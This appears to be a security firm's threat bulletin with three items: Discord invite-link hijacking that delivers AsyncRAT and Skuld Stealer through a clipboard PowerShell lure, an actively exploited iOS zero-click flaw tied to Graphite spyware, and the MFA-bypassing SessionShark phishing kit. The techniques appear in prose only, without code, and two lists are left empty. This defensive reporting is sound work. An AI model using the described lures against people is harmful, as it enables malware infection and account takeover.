A critical vulnerability has been discovered in Discord’s invitation system. The vulnerability allows attackers to hijack the vanity link registration system and subsequently distribute the Remote Access Trojan AsyncRAT and information stealer Skuld.
The method observed involves attackers gaining access to deleted or expired invitation links. Users can create temporary, permanent and vanity link invites through Discord. Discord prevents re-use of expired or deleted permanent and temporary invitation links by legitimate servers. However, it has been discovered that it is possible to reuse the vanity (custom) invitation links after expiry, or after deletion in some cases.
The attacker is able to gain access to the custom invite link and redirect the unsuspecting users to a malicious server, where they complete a verification step, which directs them to a “verify” button to prove their wallet ownership. Clicking this verify button executes JavaScript, which copies a PowerShell command to their clipboard. The users are then requested to launch the Windows run dialog and are subsequently prompted to input their verification string (PowerShell command) and press enter to verify their account.
Unfortunately for the user, this is not a legitimate account verification and results in the download of a Powershell script which has been hosted on Pastebin. This script is then used to retrieve and execute a first stage downloader which is used to drop and execute Skuld Stealer and AsyncRAT from a remote server.
AsyncRAT is a Remote Access Trojan with significant remote access capabilities. It uses a technique known as “dead drop resolver” which allows attackers to post content on web services, which are often obfuscated or encoded URLs or IP addresses. This results in users reaching out to these seemingly legitimate web services and being redirected by the embedded resolver.
The Skuld stealer is a malware tool that is written in Go and is designed to target windows systems. The purpose of the malware is to harvest sensitive data from platforms like Discord, gaming platforms, crypto wallets and browsers.
References:
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets (thehackernews.com)
The Discord Invite Loop Hole Hijacked for Attacks (research.checkpoint.com)
Hackers use Discord invite links to deliver malware (mitrade.com)
Web Service: Dead Drop Resolver, Sub-technique T1102.001 – Enterprise (attack.mitre.org)
The United States Cyber Security and Infrastructure Security Agency (CISA) has recently issued a high priority alert regarding a critical zero-click vulnerability found within Apple’s iOS operating system. This vulnerability is tracked under CVE-2025-43200 and can enable attackers to compromise the integrity of iOS, iPadOS, macOS, watchOS and visionOS devices without any user interaction whatsoever. There is currently no CVSS or EPSS Scoring data for this vulnerability currently due to the recency of the discovery.
The vulnerability stems from a logic issue within Apple’s Messages application when processing maliciously crafted photos or videos shared via iCloud links, meaning that an attacker would just have to send a malicious media file to the target victim and that’s it. No interaction from the target user is required to exploit this vulnerability, which means that once the exploit has been triggered, an attacker could gain full access to the target’s device allowing for remote code execution and total device control.
A digital rights research group known as Citizen Lab has observed the use of this zero-click vulnerability in the wild, with the vulnerability being exploited in relation to the installation of spyware tracked as “Graphite”, which is a sophisticated form of spyware developed by Paragon typically sold to and used by government and intelligence agencies that once installed, can access sensitive information including:
Apple have already patched CVE-2025-43200 in iOS 18.3.1 and related updates released on February 10, 2025, but did not publicly disclose the exploit’s details until June, after Citizen Lab’s findings were published. Devices running earlier versions have remained vulnerable through early 2025.
References:
CISA Alerts: iOS Zero Click Flaw Actively Exploited (gbhackers.com)
Graphite Caught: First Forensic Confirmation of Paragon’s iOS Mercenary Spyware Finds Journalists Targeted (citizenlab.ca)
Paragon ‘Graphite’ Spyware Linked to Zero-Click Hacks on Newest iPhones (securityweek.com)
Graphite Spyware Used to Infect iPhones of European Journalists (bitdefender.com)
A new and particularly insidious phishing kit known as SessionShark has emerged, posing a significant risk to organisations utilising Microsoft Office 365.
What is SessionShark?
SessionShark is a phishing toolkit that enables attackers to steal login credentials and session tokens, bypassing MFA protections on Microsoft Office 365 accounts. It employs an adversary-in-the-middle (AiTM) technique, directing victims to highly realistic fake login pages that mimic Microsoft’s interface. These pages capture credentials and session cookies in real time, granting attackers immediate account access. SessionShark is sold on cyber crime forums with subscription plans and Telegram-based support, making it accessible to low-skill attackers.
The phishing-kit-as-a-service model reflects a growing trend in cyber crime, where attackers design and market their tools with usability and scalability in focus. Similar to the ransomware-as-a-service (RaaS) model, phishing kits like SessionShark are now frequently offered through subscription plans, providing developers with consistent revenue and expanding their user base.
Why It Matters
SessionShark’s ability to bypass MFA—a cornerstone of modern cyber security—makes it a serious threat. Stolen session tokens allow attackers to access sensitive data, send fraudulent emails, or escalate attacks within networks. SessionShark’s advanced features, like antibot technology and Cloudflare proxy integration, complicate detection and takedown efforts. For organisations, this increases the risk of data breaches, financial losses, and reputational damage.
Key Features of SessionShark
SessionShark boasts a range of advanced features that make it particularly dangerous. It bypasses multi-factor authentication by capturing session tokens, allowing attackers to access accounts without requiring one-time passcodes. Its phishing pages are high-fidelity replicas of the Office 365 login interface and dynamically adapt to appear legitimate, reducing the likelihood of user suspicion. To evade detection, SessionShark employs anti-bot tactics such as CAPTCHAs and custom scripts that block automated security scanners. The infrastructure is often hidden behind Cloudflare proxies, making it difficult to trace or block via IP-based methods. Additionally, the kit integrates with Telegram to send real-time alerts to attackers when credentials and tokens are successfully harvested.
Mitigation Strategies
While SessionShark presents a formidable challenge, several measures can significantly reduce the risk of a successful attack:
SessionShark shifts the game – phishing is no longer just about stolen credentials. By capturing session tokens, it bypasses MFA and enables account takeover faster than ever. Organisations must pivot beyond relying solely on MFA, adopting layered detection and session-centric defences.
References:
SessionShark Steals Session Tokens to Slip Past Office 365 MFA (slashnext.com)
‘SessionShark’ ToolKit Evades Microsoft Office 365 MFA (darkreading.com)
MFA Under Attack: AiTM Phishing Kits Abusing Legitimate Services (darktrace.com)
Norm tracks and monitors the latest security trends and cyber threats and collates these into a fortnightly threat bulletin.
You can receive this bulletin for free, every fortnight, by entering your business email address below:
